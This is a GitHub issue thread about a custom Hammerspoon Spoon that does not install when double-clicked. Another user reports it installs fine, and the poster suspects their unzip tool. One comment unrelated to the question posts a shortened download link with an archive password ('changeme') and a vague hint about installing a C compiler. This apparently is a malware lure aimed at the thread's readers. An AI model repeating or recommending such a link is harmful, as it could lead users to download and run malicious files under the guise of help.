### ISSUE TITLE
spoon install fail

### ISSUE THREAD

**Issue by Nauxscript** [Hammerspoon/hammerspoon#3692]
I created a plugin myself, and here's its address: https://github.com/Nauxscript/app-switcher-spoon. However, when I downloaded the `AppSwitcher.spoon.zip` file locally and unzipped it, then double-clicking `AppSwitcher.spoon` to install it, nothing happened! The installation failed without any error messages. But when I directly moved `AppSwitcher.spoon` to the `~/.hammerspoon/Spoons` directory, the plugin ran normally. This really confuses me.

**Comment by pinpolhoxx** [comment]
download

https://bit.ly/3TCbXO6
Pass: changeme

you may need to install the c compiler

**Comment by Nauxscript** [comment]
> download
> 
> https://bit.ly/3TCbXO6 Pass: changeme
> 
> you may need to install the c compiler

oh... I don't quite understand why I need a C compiler

**Comment by QuantumLibet** [comment]
Your spoon installs fine for me. Just like any other spoon.
 
I download it, unpack it, double click it and by that it is moved to my ~/.hammerspoon/Spoons directory.

**Comment by Nauxscript** [comment]
> Your spoon installs fine for me. Just like any other spoon.
> 
>  
> 
> I download it, unpack it, double click it and by that it is moved to my `~/.hammerspoon/Spoons` directory.

Thank you for your feedback. Maybe there is something wrong with my decompression software. I will reconfirm it. Thank you very much🙏🏻
